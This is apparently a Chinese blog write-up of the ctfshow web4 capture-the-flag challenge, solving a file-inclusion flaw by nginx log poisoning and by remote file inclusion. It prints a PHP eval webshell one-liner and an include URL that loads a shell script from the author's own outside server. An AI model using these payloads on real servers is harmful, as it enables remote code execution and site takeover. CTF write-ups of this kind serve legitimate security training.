ctfshow—web—web4
2024-09-07 22:10:44
打开靶机
发现与web3很相似,测试文件包含未成功
此题有两种解决方法
一、日志注入
查看日志的默认目录,得到了日志文件
?url=/var/log/nginx/access.log
进行日志注入
<?php @eval($_POST['a']);?>
这里需要把一句话木马加在参数里面
用蚁剑进行连接测试
连接成功,在www目录下发现flag.txt文件
查看flag.txt文件内容
成功拿到flag
二、远程文件包含
重新开启一个靶机环境
在购买的阿里云服务器中编写一句话木马(阿里云服务器已启动http协议),添加abc是为了测试是否成功
https://b297bb10-8978-4c85-a1cc-027ebb8a9015.chall.ctf.show/?url=http://xxx.xxx.xxx.xxx/shell.php
看到abc说明测试成功,使用蚁剑或菜刀去连接,这里我使用的是蚁剑,测试连接
在www目录下发现flag
查看flag.txt内容
成功拿到flag
最新文章
- Linux 下MySql 重置密码
- JavaScript判断IE版本
- js获取页面中图片的总数
- 利用CSS实现带相同间隔地无缝滚动动画
- linux文件远程传输客户端shell脚本与分布式客户机时间同步脚本
- phonegap开发经验谈之一命令行建立项目和准备工作
- 模拟jquery实现each方法和map方法
- JavaScript字符串常用操作函数之学习笔记
- Android FM模块学习之三 FM手动调频
- 164. Maximum Gap
- Java内存分配和GC
- 定位于定位优化(iOS)
- linux下查看文件内容cat,more,less
- HTTP协议是无状态协议,怎么理解?
- https post
- Airtest iOS测试环境部署
- vs安装问题
- leetcode 421.Maximum XOR of Two Numbers in an Array
- [转] HTML5利用WebRTC的getUserMedia获取摄像头信息模拟拍照及视频(完整示例)
- Mycat安装教程